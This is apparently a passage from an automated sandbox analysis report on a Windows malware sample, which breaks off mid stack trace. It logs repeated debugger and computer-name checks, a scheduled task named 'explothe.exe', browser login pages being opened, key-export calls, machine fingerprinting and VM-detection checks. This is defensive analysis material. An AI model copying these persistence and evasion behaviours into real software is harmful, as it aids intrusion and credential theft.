GetComputerNameW Nov. 3, 2023, 12:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Nov. 3, 2023, 12:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:03 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 3, 2023, 12:04 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (37 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Nov. 3, 2023, 12:03 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:03 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:03 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:03 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:03 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:03 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:03 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:04 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:04 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:04 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:04 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:04 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:04 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:04 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:04 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:04 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:04 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:04 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:04 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:04 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:04 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:04 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:04 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:03 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:03 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:03 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:04 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:04 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:04 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:04 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:04 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:04 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:04 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:04 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:04 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:04 p.m.			0	0
IsDebuggerPresent Nov. 3, 2023, 12:04 p.m.			0	0

Command line console output was observed (50 out of 146 events)

Time & API	Arguments	Status	Return
WriteConsoleW Nov. 3, 2023, 12:03 p.m.	buffer: SUCCESS: The scheduled task "explothe.exe" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Nov. 3, 2023, 12:03 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\IXP000.TMP> console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 3, 2023, 12:03 p.m.	buffer: start console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 3, 2023, 12:03 p.m.	buffer: "" https://accounts.google.com console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 3, 2023, 12:03 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\IXP000.TMP> console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 3, 2023, 12:03 p.m.	buffer: start console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 3, 2023, 12:03 p.m.	buffer: "" https://www.facebook.com/login console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 3, 2023, 12:03 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\IXP000.TMP> console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 3, 2023, 12:03 p.m.	buffer: start console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 3, 2023, 12:03 p.m.	buffer: "" https://accounts.google.com console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 3, 2023, 12:03 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\IXP000.TMP> console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 3, 2023, 12:03 p.m.	buffer: start console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 3, 2023, 12:03 p.m.	buffer: "" https://store.steampowered.com/login/ console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 3, 2023, 12:03 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\IXP000.TMP> console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 3, 2023, 12:03 p.m.	buffer: start console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 3, 2023, 12:03 p.m.	buffer: "" https://twitter.com/i/flow/login console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 3, 2023, 12:03 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\IXP000.TMP> console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 3, 2023, 12:03 p.m.	buffer: start console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 3, 2023, 12:03 p.m.	buffer: "" https://steamcommunity.com/openid/loginform/ console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 3, 2023, 12:03 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\IXP000.TMP> console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 3, 2023, 12:03 p.m.	buffer: start console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 3, 2023, 12:03 p.m.	buffer: "" https://www.epicgames.com/id/login console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 3, 2023, 12:03 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\IXP000.TMP> console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 3, 2023, 12:03 p.m.	buffer: start console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 3, 2023, 12:03 p.m.	buffer: "" https://www.paypal.com/signin console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 3, 2023, 12:03 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\IXP000.TMP> console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 3, 2023, 12:03 p.m.	buffer: start console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 3, 2023, 12:03 p.m.	buffer: "" https://www.youtube.com console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 3, 2023, 12:04 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\IXP000.TMP> console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 3, 2023, 12:04 p.m.	buffer: start console_handle: 0x0000000000000007	1	1
WriteConsoleW Nov. 3, 2023, 12:04 p.m.	buffer: "" https://accounts.google.com console_handle: 0x0000000000000007	1	1
WriteConsoleA Nov. 3, 2023, 12:03 p.m.	buffer: A console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 12:03 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 12:03 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 12:03 p.m.	buffer: y console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 12:03 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 12:03 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 12:03 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 12:03 p.m.	buffer: u console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 12:03 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 12:03 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 12:03 p.m.	buffer: Y console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 12:03 p.m.	buffer: N console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 12:03 p.m.	buffer: p console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 12:03 p.m.	buffer: r console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 12:03 p.m.	buffer: o console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 12:03 p.m.	buffer: c console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 12:03 p.m.	buffer: e console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 12:03 p.m.	buffer: s console_handle: 0x00000007	1	1
WriteConsoleA Nov. 3, 2023, 12:03 p.m.	buffer: s console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 127 events)

Time & API	Arguments	Status	Return
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f9458 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f9458 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f9458 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f9458 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f94d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f94d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f93d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f93d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f93d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f93d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f93d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f9458 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f9458 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f9658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f9d98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f9d98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004f9c58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f8e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f9458 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f9458 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f9458 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f8bd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f8bd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f8bd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f8bd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f8bd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f8bd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f9058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f9058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f9058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f9058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f9058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f9058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f9458 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f9058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f9058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f9058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f9058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f9058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f9058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f9058 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f98d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f98d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f98d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f98d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f98d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f98d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f98d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f98d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 3, 2023, 12:03 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005f98d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

wextract.pdb

Tries to locate where the browsers are installed (4 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file	C:\Program Files\Mozilla Firefox\firefox.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe\PATH

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Nov. 3, 2023, 12:03 p.m.		1	1	0

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

AVI

One or more processes crashed (50 out of 80 events)

Time & API	Arguments	Status
__exception__ Nov. 3, 2023, 12:03 p.m.	stacktrace: 0xa3c055 0xa3be26 0xa36c85 0xa3685e 0xa33483 0xa32ee8 0xa32e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa3c190 registers.esp: 2812500 registers.edi: 2812552 registers.eax: 0 registers.ebp: 2812564 registers.edx: 4995856 registers.ebx: 2813772 registers.esi: 42285080 registers.ecx: 0	1
__exception__ Nov. 3, 2023, 12:03 p.m.	stacktrace: 0x4a74470 0x4a70580 0xa3fe91 0xa3fdad 0xa3e44b 0xa3d716 0xa3c787 0xa36d4d 0xa3685e 0xa33483 0xa32ee8 0xa32e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4a744b3 registers.esp: 2811060 registers.edi: 2811344 registers.eax: 0 registers.ebp: 2811068 registers.edx: 0 registers.ebx: 2813772 registers.esi: 42706388 registers.ecx: 43832688	1
__exception__ Nov. 3, 2023, 12:03 p.m.	stacktrace: 0x4a74470 0x4a70580 0xa3fe91 0xa3fdc5 0xa3e44b 0xa3d716 0xa3c787 0xa36d4d 0xa3685e 0xa33483 0xa32ee8 0xa32e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73fc4de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x4a744b3 registers.esp: 2811060 registers.edi: 2811344 registers.eax: 0 registers.ebp: 2811068 registers.edx: 0 registers.ebx: 2813772 registers.esi: 42706388 registers.ecx: 45138640	1
__exception__ Nov. 3, 2023, 12:03 p.m.	stacktrace: 0x4a74470 0x4a70580 0xa3fe91 0xa3fdc5 0xa3e44b 0xa3d716 0xa3c787 0xa36d4d 0xa3685e 0xa33483 0xa32ee8 0xa32e7b DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73f4f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73fc7f16 